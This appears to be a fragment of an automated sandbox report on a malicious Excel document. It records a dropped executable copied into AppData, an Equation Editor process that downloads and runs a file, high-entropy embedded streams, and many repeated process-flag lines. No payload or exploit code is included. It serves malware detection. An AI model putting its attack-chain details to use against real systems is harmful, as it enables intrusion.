Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe File created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy) Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03640505 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03640505
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D392B/CONTENTS' entropy: 7.98177286202 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D392C/CONTENTS' entropy: 7.91669502048 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D392D/CONTENTS' entropy: 7.90090466154 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D392F/CONTENTS' entropy: 7.94631733096 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D3930/CONTENTS' entropy: 7.91669502048 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D3931/CONTENTS' entropy: 7.94924924846 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D3933/CONTENTS' entropy: 7.94631733096 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'MBD001D3934/Package' entropy: 7.98610659657 (max. 8.0)
Source: MV_TRANS-ASIA_I.xls Stream path 'Workbook' entropy: 7.90099886459 (max. 8.0)
Source: ~WRF{9E2CC624-EAF0-4813-82C9-76A9DA993D34}.tmp.6.dr Stream path '_1751086122/Package' entropy: 7.96183395866 (max. 8.0)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
